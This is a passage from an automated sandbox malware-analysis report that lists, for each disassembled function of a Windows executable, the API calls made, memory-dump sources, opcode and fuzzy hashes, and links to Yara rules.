                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                                • String ID:
                                                                                                                • API String ID: 2632138820-0
                                                                                                                • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                                                • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                                                Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                                • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CursorLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 3238433803-0
                                                                                                                • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                                                • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                                                Function 0045F48E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 226windowsleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu$Sleep
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1196289194-4108050209
                                                                                                                • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                                • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                                Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromStringTask
                                                                                                                • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                                                • API String ID: 910554386-934586222
                                                                                                                • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                                                • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                                                Function 00434506 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00434585
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                • String ID: (
                                                                                                                • API String ID: 3300687185-3887548279
                                                                                                                • Opcode ID: 850e4e4f4a3144c0c65e94ebd0f1e451ef245c66964f5ba666016bedf541cb72
                                                                                                                • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                                • Opcode Fuzzy Hash: 850e4e4f4a3144c0c65e94ebd0f1e451ef245c66964f5ba666016bedf541cb72
                                                                                                                • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                                                Function 0046F90E Relevance: 21.1, APIs: 14, Instructions: 147windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                                                • DeleteObject.GDI32(?), ref: 0046F950
                                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                                                • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                                                • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                                                • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                                                • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3412594756-0
                                                                                                                • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                                                • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                                                Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$BuffCharDriveLowerType
                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                • API String ID: 1600147383-4113822522
                                                                                                                • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                                • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                                                Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                                • DeleteObject.GDI32(?), ref: 00433603
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3969911579-0
                                                                                                                • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                                Function 0045510D Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                                                • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                                                • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                                                • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                                                • DrawMenuBar.USER32 ref: 00455207
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 956284711-4108050209
                                                                                                                • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                                • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                                                Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                                • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                                                • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromQueryStringValue$CloseFreeLoadOpenTaskType
                                                                                                                • String ID: Version$\TypeLib$interface\
                                                                                                                • API String ID: 3215668907-939221531
                                                                                                                • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                Function 0044920C Relevance: 18.2, APIs: 12, Instructions: 243windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                                                • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                                                • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                                                • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                                                • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CharNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 1350042424-0
                                                                                                                • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                                • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                                Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                                • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                                • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                                                • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                                • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                                • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                                • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                                                • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                                                Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConnectRegistry
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 76216097-2761332787
                                                                                                                • Opcode ID: dd977f09bea9308b610c7238e96fb584538275b520f46e9374bb1ad9d3878166
                                                                                                                • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
